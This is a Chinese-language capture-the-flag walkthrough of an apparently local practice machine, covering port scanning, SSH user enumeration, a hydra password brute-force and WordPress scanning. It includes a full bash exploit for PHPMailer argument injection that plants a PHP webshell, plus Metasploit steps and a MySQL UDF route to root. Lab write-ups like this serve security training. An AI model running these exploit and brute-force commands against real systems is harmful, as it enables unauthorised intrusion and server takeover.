| 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.10 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
|
try1-ssh用户枚举
| python ssh.py --userList /usr/share/wordlists/linux-user.txt --outputFile out.txt 192.168.2.133
cat out.txt | grep -v 'not' > name.txt
awk '{print $1}' name.txt > user.txt
|
获得的用户:
hydra -L user.txt -P /usr/share/wordlists/rockyou.txt -I 192.168.2.133 ssh
我猜弱口令应该已经修补了。但是还是得试一试,==,万一又有,我又没发现这么低级的漏洞,岂不是很没有面子。
try2-web enum
方法:
wpscan --url "http://192.168.2.133/wordpress/" --wp-content-dir "/wordpress" --enumerate u --enumerate p
信息:
| WordPress 4.8.7
Apache/2.4.10 (Debian)
后台:http://raven.local/wordpress/wp-login.php
192.168.2.133/vendor/changelog.md
PHPMailer 6.0
Version 5.2.17 (December 9th 2016)
|
| searchsploit PHPMailer
PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution | exploits/php/webapps/42221.py
|
searchsploit -m exploits/php/webapps/42221.py
| Exploit: PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution
URL: https://www.exploit-db.com/exploits/42221/
Path: /usr/share/exploitdb/exploits/php/webapps/42221.py
File Type: Python script, ASCII text executable, with CRLF line terminators
Copied to: /root/42221.py
|
see /root/42221.py
mv /root/42221.py rce_phpmailer_exim4.py
python rce_phpmailer_exim4.py -url http://192.168.2.133/ -cf contact.php -ip 192.168.2.133
时隔2个月,继续这个靶机的练习
192.168.241.128
command:
| echo 192.168.241.128 raven.local >> /etc/hosts
wpscan --url "http://192.168.241.128/wordpress/" --wp-content-dir "/wordpress" --enumerate
|
存在的目录:
http://raven.local/vendor/changelog.md
http://raven.local/manual/en/index.html apache的目录
wordpress 4.8.7漏洞资料
https://www.cvedetails.com/vulnerability-list/vendor_id-2337/product_id-4096/version_id-224338/Wordpress-Wordpress-4.8.html
CVE-2018-20148:PHP Object Injection via Meta Data
info:
http://192.168.241.128/wordpress/?attachment_id=11
wpscan扫描了这个目录,获得flag3
http://raven.local/vendor/PATH
发现目录遍历,获得flag1
思路
无弱密码;有0day漏洞,但没有exp;无脆弱的wordpress插件
查看wp后,就是自己没有发现目录遍历漏洞=。=
http://raven.local/vendor/security.md 暗示了phpmailer插件版本漏洞
| touch test.rc
use exploit/multi/http/phpmailer_arg_injection
set RHOST 192.168.241.128
set TARGETURI /contact.php
set WEB_ROOT /var/www/html/
run
msfconsole -r test.rc
反弹shell失败。。。
|
exp.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
| #!/bin/bash
TARGET=http://raven.local/contact.php
DOCROOT=/var/www/html
FILENAME=backdoor.php
LOCATION=$DOCROOT/$FILENAME
STATUS=$(curl -s \
--data-urlencode "name=Hackerman" \
--data-urlencode "email=\"hackerman\\\" -oQ/tmp -X$LOCATION blah\"@badguy.com" \
--data-urlencode "message=<?php echo shell_exec(\$_GET['cmd']); ?>" \
--data-urlencode "action=submit" \
$TARGET | sed -r '146!d')
if grep 'instantiate' &>/dev/null <<<"$STATUS"; then
echo "[+] Check ${LOCATION}?cmd=[shell command, e.g. id]"
else
echo "[!] Exploit failed"
fi
|
运行以上exp,成功获得一个webshell,权限为www-data
接下来用php反弹shell,如同这篇文章
python -c ‘import pty; pty.spawn(“/bin/bash”)’
之后,web目录泄露mysql密码,得到mysql普通权限。
然后上传udf源代码,执行安装,就可以使用do_system()函数,以root权限执行命令。
https://whale3070.github.io/training/2018/12/11/x/
总结
之前用searchsploit 找到了关于phpmailer的exp,php、bash、python的exp,都执行失败了。
看到过一个问题,web渗透该如何继续提升?除非遇到一样的web站点,该搞不下来的网站,还是搞不下来。
我认为应该用代码能力,写工具,尽可能扩大目标攻击面(只有知道,才能看到弱点),然后精力放在漏洞挖掘上。
而不是脚本小子运用已知exp对漏洞进行利用。
就好像我知道锁A、B、C,我有钥匙a,刚好Aa能配上,我就能进入系统。
经过验证,搞不下来的站点,除非有0day漏洞,那就证明了该站点很安全。
继续提升代码能力以及漏洞挖掘能力吧…